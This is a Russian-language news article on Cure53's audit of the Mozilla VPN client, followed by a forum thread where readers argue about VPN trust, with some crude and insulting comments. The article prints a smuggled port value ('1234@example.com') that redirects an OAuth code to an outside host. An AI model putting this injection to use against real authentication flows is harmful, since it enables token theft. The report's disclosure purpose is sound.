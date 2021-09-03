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Опубликованы результаты аудита VPN-клиента Mozilla

03.09.2021 10:07

Компания Mozilla объявила о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS. Работу Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN-сервису производится при помощи протокола WireGuard.

Аудит выполнен компанией Cure53, в своё время проводившей аудит проектов NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В ходе проверки выявлено 16 проблем с безопасностью, 8 из которых имели характер рекомендаций, 5 присвоен низкий уровень опасности, двум - средний, а одной - высокий.

При этом лишь одна проблема со средним уровнем опасности была отнесена к категории уязвимостей, так как только она была пригодна для эксплуатации. Указанная проблема приводила к утечке сведений о применений VPN в коде для определения captive portal из-за отправки незашифрованных прямых запросов по HTTP, передаваемых вне VPN-туннеля и раскрывающих основной IP-адрес пользователя в случае если атакующий может контролировать транзитный трафик. Проблема решается отключением режима определения captive portal в настройках.

Вторая проблема среднего уровня опасности связана с отсутствием должной чистки нечисловых значений в номере порта, что позволяет организовать утечку параметров аудентификации OAuth через подмену номера порта на строку вида "1234@example.com", что приведёт к установке тега <img src="http://127.0.0.1:1234@example.com/?code=..." alt="">, обращающегося к example.com вместо 127.0.0.1.

Третья проблема, помеченная как опасная, позволяет любому локальному приложению без аутентификации обратиться к VPN-клиенту через WebSocket, привязанный к localhost. В качестве примера показано, как при активном VPN-клиенте любой сайт мог организовать создание и отправку скриншота через генерацию события screen_capture. Проблема не отнесена к категории уязвимостей, так как WebSocket использовался только во внутренних тестовых сборках и применение данного канала связи лишь планировалось в будущем для организации взаимодействия с браузерным дополнением.

  1. Главная ссылка к новости (https://blog.mozilla.org/en/mo...)
  2. OpenNews: В Mozilla VPN появилась поддержка Linux и macOS
  3. OpenNews: Официально запущен сервис Mozilla VPN
  4. OpenNews: Компания ExpressVPN открыла наработки, связанные с VPN-протоколом Lightway
  5. OpenNews: Обновление OpenVPN 2.5.3. Отключение Opera VPN и VyprVPN в РФ
  6. OpenNews: Continent - VPN клиент/сервер и зашифрованный файл-контейнер
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/55730-vpn
Ключевые слова: vpn, mozilla
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, Аноним (1), 10:15, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    Лучшая — лучшая организация в мире! Как бы я хотел там работать, но я туповат для этого.
     
     
  • 2.9, большинство (?), 10:39, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +14 +/
    Укажи в резюме, что сочувствуешь меньшинствам.
     
     
  • 3.27, мурзилла (?), 12:04, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну нет, сочувствием тут не отделаешься - раз-другой в оппу дать придется!

     
     
  • 4.41, anonym13 (?), 13:32, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Вы просто удивительно токсичные мразоты. Не удивительно что вас никто нигде не любит.
     
     
  • 5.42, Аноним (42), 13:43, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    мурзилла создала раст за что её можно любить?
     
  • 3.38, Аноним (38), 13:23, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    "Отношусь к интеллектуальнму меньшинству" и все, не смогут не взять!
     
     
  • 4.43, Аноним (42), 13:44, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А если начнут устраивать сегрегацию по интеллектуальному признаку засудить нафиг.
     
  • 2.14, КО (?), 10:53, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Что-то Speech-to-text у данной организации до сих пор не готов.
    Даже элементарный переводчик до сих пор дорабатывают.
     
  • 2.16, Аноним (16), 11:02, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ах если бы... Мозилка в последнее время коллективно поехала кукухой и топит за цензуру.
     
  • 2.36, Аноним (36), 13:16, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Cure53?
     

  • 1.2, Аноним (2), 10:21, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    Так а смысл, если сам по себе WireGuard отстреливается на ура?
     
     
  • 2.44, OpenEcho (?), 13:49, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Пруффс плыз
     
     
  • 3.48, Аноним (-), 14:14, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    В моей сети, например, открыт только TCP 443. WireGuard через него не работает.
     

  • 1.3, iPony129412 (?), 10:24, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Жаль всё ограниченно по территории сильно.
    А так заканчивается подписка на protonVPN - жду их ❤🦊
     
     
  • 2.12, Аноним (12), 10:46, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А как же 🐎VPN? Всем поням премиум-аккаунт бесплатно!
     

  • 1.4, Аноним (4), 10:24, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Когда будут опубликованы результаты аудита аудитора? И аудита аудитора аудитора?
     
     
  • 2.5, Sergey (??), 10:28, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Зачем так сложно ? Ведь написано Мозилла объявила ...
     
  • 2.17, Аноним (17), 11:02, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Когда будут опубликованы результаты аудита аудитора с помощью PVS Studio?

    пофиксил

     
  • 2.33, Аноним (33), 12:21, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >Когда будут опубликованы результаты аудита аудитора

    Когда будут опубликованы результаты проверки аудитора на соответствие требованиям для допуска к гостайне.

     

  • 1.6, ixrws (??), 10:32, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    И с каких пор такой аудит считается показателем чего либо? Там работают люди, даже если они свою работу сделали хорошо(а откуда мы знаем?), то они всего лишь люди и могли не заметить массу всего.

    Какой-то странный мир стал, люди доверяют каким-то заявлениям просто потому, что одно громкое имя сделало подпись под заявлением. Ну так таким макаром можно доверять и Гитлеру, там громких имён с подписями было достаточно и аудиты разного рода они тоже проводили.

     
     
  • 2.7, Enamel (ok), 10:35, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    По такой логике нужно срочно отключиться от интернета, выкинуть всю технику и уйти в лес
     
     
  • 3.21, лесник (?), 11:07, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    П-3ды дам! Вали из моего леса!

     
  • 2.11, Нанобот (ok), 10:43, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Наличие аудита лучше отсутствия аудита.
     
  • 2.24, Аноним (24), 11:18, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Ну так таким макаром можно доверять и Гитлеру

    Иногда думаешь, что комментаторы с Опеннета уже ничем тебя не удивят, но раз за разом оказываешься неправ.

     
  • 2.39, Alex (??), 13:24, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Так Гитлеру и доверял весь западный мир. Пока он бомбить не начал теми кто доверял ему больше.
     

  • 1.8, Аноним (8), 10:37, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > вопросы, связанные с криптографией не рассматривались

    Кстати, почему?

     
     
  • 2.10, Аноним (10), 10:42, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    На аудите криптографии и кода  специализируются разные конторы. Там протокол WireGuard, внешний аудит которого, насколько я могу судить,  пока ещё никто не проводил.
     
     
  • 3.13, хм (?), 10:52, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Так он же формально верифицирован.
     
  • 3.45, OpenEcho (?), 13:54, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Там протокол WireGuard, внешний аудит которого, насколько я могу судить,  пока ещё никто не проводил.

    Анализ от MIT подойдет судье?

    https://courses.csail.mit.edu/6.857/2018/project/He-Xu-Xu-WireGuard.pdf

     
  • 2.20, Аноним (16), 11:06, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Потому что это не софт мозиллы. Плюс, мозилла на самом деле не заведует VPN-сервисом -- они перепродают Mullvad. А вот те ребята уже упарываются по верификации всего и вся. Почитай про их проект System Transparency, в рамках которого они пытаются гарантировать, что их vpn-cерверы крутят именно тот софт, который заявлен. Весьма крутая штука.
     
     
  • 3.30, Аноним (30), 12:12, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Весьма крутая штука на словах. Не забываем из какой страны ложное обвинение Ассанжа пришло.
     
     
  • 4.37, Аноним (37), 13:18, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Так же не забываем, в какой стране появился The Pirate Bay. Я думаю, он один перекрывает десяток поехавших феминисток.
     

  • 1.15, Аноним (15), 10:59, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –2 +/
    Все так же доверять можно лишь ProtonVPN.
     
     
  • 2.23, iPony129412 (?), 11:17, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это когда они в открытую врали с самолётом? ✈
     
     
  • 3.29, Аноним (15), 12:12, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    А что там было с самолетом?
     
     
  • 4.34, iPony129412 (?), 12:43, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > А что там было с самолетом?

    https://www.reuters.com/world/europe/email-bomb-threat-sent-after-bloggers-pla

     
     
  • 5.40, Аноним (15), 13:29, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Спасибо, теперь я их презираю. Где лучше почту завести?
     
     
  • 6.50, Аноним (-), 14:17, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Рамблер/почта
     
  • 5.49, Аноним (-), 14:16, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >Access Denied
     
  • 3.32, Аноним (32), 12:16, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Ну доверяют же "безопасному" Телеграмму. А там враньё на вранье и враньем погоняет.
     
  • 2.46, OpenEcho (?), 14:02, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    > Все так же доверять можно лишь ProtonVPN.

    Доверять можно только купленному
    VPS за бугром с установленным VPN-om, который соединен к другому
    VPS за бугром с установленным VPN-om, который соединен к другому
    VPS за бугром с установленным VPN-om, который соединен к другому
    ...
    ...
    ...
    VPS за бугром с установленным VPN-om, который соединен к другому,
    который в свою очередь использует купленные на черном рунке зараженные зомби, проксировав через которые  надо чейнить к цепочке
    VPS за бугром с установленным VPN-om, который соединен к другому
    VPS за бугром с установленным VPN-om, который соединен к другому
    ...
    VPS за бугром с установленным VPN-om, который соединен к другому

    Но презик на всякий случай все равно лучше иметь, т.к. фингерпринт браузера обнулит всю эту хитропопость

     
     
  • 3.52, Аноним (-), 14:24, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Доверяю Tor Browser через 2 VPN.
     

  • 1.18, Аноним (18), 11:04, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    У нас 6 впн сервисов сейчас заблокировали и этот если надо ляжет. Вообще конечно продолжайте делать ставки на спорт и верить в криптомани.  Лох не мамонт - лох не вымрет С.Мавроди (с)
     
  • 1.22, Moomintroll (ok), 11:11, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    "обособленного" - это "proprietary"? В данном контексте, по-моему, неудачный перевод.
     
     
  • 2.51, Аноним (10), 14:18, 03/09/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Видимо имелось в виду отдельное приложение, а не дополнение к браузеру.

     

  • 1.53, Аноним (53), 14:27, 03/09/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Развели заопарк в этой мозиле. Gtk, rust, Qt.

    Выбрасывайте всё это и идите на Qt полнсотью. Может тода им пользоваться можно будет. А то таки единственный вменяемый браузер какраз на Qt. Вернее их 2

     

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